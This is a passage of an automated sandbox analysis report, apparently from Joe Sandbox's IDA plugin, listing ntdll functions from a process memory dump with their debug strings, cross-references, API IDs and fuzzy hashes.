                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017E9A11, 017E9A3A
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 3446177414-204845295
                                                                                        Strings
                                                                                        • VerifierDlls, xrefs: 01818CBD
                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01818A67
                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01818B8F
                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01818A3D
                                                                                        • HandleTraces, xrefs: 01818C8F
                                                                                        • VerifierDebug, xrefs: 01818CA5
                                                                                        • VerifierFlags, xrefs: 01818C50
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                        • API String ID: 0-3223716464
                                                                                        Strings
                                                                                        • LdrpDynamicShimModule, xrefs: 017FA998
                                                                                        • apphelp.dll, xrefs: 017B2462
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017FA9A2
                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 017FA992
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-176724104
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-792281065
                                                                                        Strings
                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01802178
                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01802160, 0180219A, 018021BA
                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0180219F
                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01802180
                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018021BF
                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01802165
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                        • API String ID: 0-861424205
                                                                                        Strings
                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01808181, 018081F5
                                                                                        • LdrpInitializeProcess, xrefs: 017CC6C4
                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01808170
                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 018081E5
                                                                                        • LdrpInitializeImportRedirection, xrefs: 01808177, 018081EB
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017CC6C3
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                        • API String ID: 0-475462383
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-4253913091
                                                                                        APIs
                                                                                        Strings
                                                                                        • LdrpCheckModule, xrefs: 017FA117
                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 017FA10F
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017FA121
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 3446177414-161242083
                                                                                        APIs
                                                                                        Strings
                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 018082DE
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 018082E8
                                                                                        • Failed to reallocate the system dirs string !, xrefs: 018082D7
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 3446177414-1783798831
                                                                                        APIs
                                                                                        Strings
                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01814899
                                                                                        • LdrpCheckRedirection, xrefs: 0181488F
                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01814888
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                        • API String ID: 3446177414-3154609507
                                                                                        APIs
                                                                                          • Part of subcall function 017D2DF0: LdrInitializeThunk.NTDLL ref: 017D2DFA
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BA3
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0BB6
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D60
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017D0D74
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 1404860816-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID:
                                                                                        • API String ID: 3446177414-0
                                                                                        APIs
                                                                                        Strings
                                                                                        • kLsE, xrefs: 01790540
                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0179063D
                                                                                        Similarity
                                                                                        • API ID: DebugPrintTimes
                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                        • API String ID: 3446177414-2547482624
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                        • API String ID: 0-379654539
                                                                                        Strings
                                                                                        • LdrpInitializeProcess, xrefs: 017C8422
                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017C855E
                                                                                        • @, xrefs: 017C8591
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017C8421
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-1918872054
                                                                                        Strings
                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018022B6
                                                                                        • .Local, xrefs: 017C28D8
                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018021D9, 018022B1
                                                                                        • SXS: %s() passed the empty activation context, xrefs: 018021DE
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                        • API String ID: 0-1239276146
                                                                                        Strings
                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01803456
                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01803437
                                                                                        • RtlDeactivateActivationContext, xrefs: 01803425, 01803432, 01803451
                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0180342A
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                        • API String ID: 0-1245972979
                                                                                        Strings
                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 017F0FE5
                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 017F106B
                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 017F1028
                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017F10AE
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                        • API String ID: 0-1468400865
                                                                                        Strings
                                                                                        • HEAP: , xrefs: 017A3264
                                                                                        • HEAP[%wZ]: , xrefs: 017A3255
                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017A327D
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                        • API String ID: 0-617086771
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $@
                                                                                        • API String ID: 0-1077428164
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                        • API String ID: 0-2779062949
                                                                                        • Opcode ID: 6b33c916946b8ad87baa37795249d7d0f6732bcd5d3cf0bcb386056880b102e1
                                                                                        • Instruction ID: 2ff96cd6f5952122b817414a42943d8cd069e56501d6abef80a991aad495dd1d
                                                                                        • Opcode Fuzzy Hash: 6b33c916946b8ad87baa37795249d7d0f6732bcd5d3cf0bcb386056880b102e1
                                                                                        • Instruction Fuzzy Hash: 8FA13C759016299BDB329B68CC88BE9F7F8EF48710F1041EADA09A7250D7359E85CF50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-1334570610
                                                                                        • Opcode ID: 6b1d6a708b445936b9177e5fbeef598916bc9dbe0c91f3b41e10dd950deb7a39
                                                                                        • Instruction ID: d7c19e86d45bc59341681f854f356f7ebc8a8d78e7309fca3bc62aa8f0d6ff53
                                                                                        • Opcode Fuzzy Hash: 6b1d6a708b445936b9177e5fbeef598916bc9dbe0c91f3b41e10dd950deb7a39
                                                                                        • Instruction Fuzzy Hash: E361CF70600301DFDB29CF28C984B6AFBE1FF84308F548A9DE9468B292D770E941CB91
                                                                                        Strings
                                                                                        • @, xrefs: 0184C1F1
                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0184C1C5
                                                                                        • PreferredUILanguages, xrefs: 0184C212
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                        • API String ID: 0-2968386058
                                                                                        • Opcode ID: 08a8282af26bc21e2dbc4fc5676b583454c81c5918061c1580ec2ee0d8995acb
                                                                                        • Instruction ID: c6080cd6b216677ce114bb2e7ad0d3dd8605179ab84eadedfe5a054d431ecf2b
                                                                                        • Opcode Fuzzy Hash: 08a8282af26bc21e2dbc4fc5676b583454c81c5918061c1580ec2ee0d8995acb
                                                                                        • Instruction Fuzzy Hash: 16416271E0121EABDB11DED9C855BEEFBBCAB14704F14416AE609E7280EBB49B448B50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                        • API String ID: 0-1373925480
                                                                                        • Opcode ID: 568f74b13463629be769e12e49532ad4ddf0cba7792282ca7ca70783cc650bcd
                                                                                        • Instruction ID: a18def77393db30abc19ec269e1966914c300e8bbaceaca2f52516aa4819af0f
                                                                                        • Opcode Fuzzy Hash: 568f74b13463629be769e12e49532ad4ddf0cba7792282ca7ca70783cc650bcd
                                                                                        • Instruction Fuzzy Hash: B0412631A00668CBEB27DBE9C844BADFBB8FF56344F240559D901EB781D7748A81CB61
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-2558761708
                                                                                        • Opcode ID: c1623926aafe7ab0acc30d5b95224098f095ce1dad853001328b30054351c395
                                                                                        • Instruction ID: 1a3bc0e3b04cefb6ea62c282362529b482891bf47b4341d6edeb8caec9a55064
                                                                                        • Opcode Fuzzy Hash: c1623926aafe7ab0acc30d5b95224098f095ce1dad853001328b30054351c395
                                                                                        • Instruction Fuzzy Hash: 8311DC31359102DFDB29DA18C854B7AF3A4EF80A16F1886ADF906CB255DB34E840C755
                                                                                        Strings
                                                                                        • LdrpInitializationFailure, xrefs: 018120FA
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01812104
                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 018120F3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-2986994758
                                                                                        • Opcode ID: 7fd4223bee133bd10622329b15ef74172662bc9e3f5d1f33ad1c3555a70b69a0
                                                                                        • Instruction ID: c214b9b2c1799054da273496ef929458a08e6d6758b2cea98c1c0795e6bf5441
                                                                                        • Opcode Fuzzy Hash: 7fd4223bee133bd10622329b15ef74172662bc9e3f5d1f33ad1c3555a70b69a0
                                                                                        • Instruction Fuzzy Hash: 6DF02875640308ABEB20E60CCC56F99B76CFB40B04F200068FA00B7285D1B0EB40CA41
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: #%u
                                                                                        • API String ID: 48624451-232158463
                                                                                        • Opcode ID: f95a3a8c57fb841490bb7549d4c388d3dce522b84deec8ec40a9609b0ccca525
                                                                                        • Instruction ID: 09efe670fbb5b4bce81f99dc862a7db26621d30a0b97fa7a99b3c47cc4c6c0db
                                                                                        • Opcode Fuzzy Hash: f95a3a8c57fb841490bb7549d4c388d3dce522b84deec8ec40a9609b0ccca525
                                                                                        • Instruction Fuzzy Hash: 9F714C71A0014A9FDB01DFA8C994FAEB7F8BF48704F144169EA05E7255EA34EE41CBA1
                                                                                        Strings
                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0181895E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                        • API String ID: 0-702105204
                                                                                        • Opcode ID: 8d01479b4beb854d622a6f5c2978983ccfd6fea917edb62bf85399879c29af18
                                                                                        • Instruction ID: d2ffa2581a9c7cf945c2de7f69fe33c4a8bc903ff6b5f3d2f0be441228b6bed1
                                                                                        • Opcode Fuzzy Hash: 8d01479b4beb854d622a6f5c2978983ccfd6fea917edb62bf85399879c29af18
                                                                                        • Instruction Fuzzy Hash: B0012B337402059BE7206F5DDCC5A6ABF6EEF83764F04001CF641C6159CF206A84CB92
                                                                                        Strings
                                                                                        • LdrResSearchResource Exit, xrefs: 0179AA25
                                                                                        • LdrResSearchResource Enter, xrefs: 0179AA13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                        • API String ID: 0-4066393604
                                                                                        • Opcode ID: 9776da6fae2d853ec10cfcbac64a464b4212714fc4276958faa65c609341912c
                                                                                        • Instruction ID: 7a0ca3351cd718a0b0ed2628251d6e6376d39863d6257fb14ca37096c6e30403
                                                                                        • Opcode Fuzzy Hash: 9776da6fae2d853ec10cfcbac64a464b4212714fc4276958faa65c609341912c
                                                                                        • Instruction Fuzzy Hash: 15E18F71A05219ABEF22CE9DD984BAEFBBAFF14314F10456AEA01E7241D738D944CB50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: `$`
                                                                                        • API String ID: 0-197956300
                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                        • Instruction ID: 0f7d451e24f36911df043c659d93df19f144587567b65ea8cc9036e1ce32ada9
                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                        • Instruction Fuzzy Hash: 12C1D1312043469BE768CE28C884B6BBBE5EFC4358F044A2DFA95C7291D775D605CB52
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Legacy$UEFI
                                                                                        • API String ID: 2994545307-634100481
                                                                                        • Opcode ID: 9559308b011c8cced47c74634912fdf9e3df6560e487f2bdfb2bf417ac7116ef
                                                                                        • Instruction ID: b3922b293bd7796f9a00fae1dc24da71a70f29acede62e6470b9205829499f68
                                                                                        • Opcode Fuzzy Hash: 9559308b011c8cced47c74634912fdf9e3df6560e487f2bdfb2bf417ac7116ef
                                                                                        • Instruction Fuzzy Hash: E0615D71E0420D9FDB65DFA8CD40BAEBBB9FB48704F54486DE649EB291D731AA00CB50
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$MUI
                                                                                        • API String ID: 0-17815947
                                                                                        • Opcode ID: 778545045eb8090d0cfbe9da932445794efdeb474d284a128d9ecaf7ea91dd7a
                                                                                        • Instruction ID: 6d66293c7e495cf328e8f40f368691a22f0c88d7732c10f0f6f4f27c28f730df
                                                                                        • Opcode Fuzzy Hash: 778545045eb8090d0cfbe9da932445794efdeb474d284a128d9ecaf7ea91dd7a
                                                                                        • Instruction Fuzzy Hash: F4512771E0021DAEDF11DFA9CC84AEEBBB9EB44754F140529E611F7291D7349A05CBA0
                                                                                        Strings
                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0179A309
                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0179A2FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                        • API String ID: 0-2876891731
                                                                                        • Opcode ID: 84ea15f7dc96161ed2e1dfa7aded8d60c5d0331d5c5df3f7322cb7801b59e8ea
                                                                                        • Instruction ID: b9e813c488e399a3f9f31fe01941bdddf2bd5629a18f2bafcd73102a10cff162
                                                                                        • Opcode Fuzzy Hash: 84ea15f7dc96161ed2e1dfa7aded8d60c5d0331d5c5df3f7322cb7801b59e8ea
                                                                                        • Instruction Fuzzy Hash: A341AD31A05649DBDB11CF59D840B6AFBB4FF84704F2440A9EE00DB396E6B5D944CB51
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                        • Associated: 00000003.00000002.1770776341.0000000001889000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.000000000188D000.00000040.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000003.00000002.1770776341.00000000018FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_1760000_DO-COSU6387686280.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                        • API String ID: 2994545307-4008356553
                                                                                        • Opcode ID: a6e2c7eb6559aec7cd7fbcd0e48aeb709e555061d588c4b19f3331d9f05d6e33
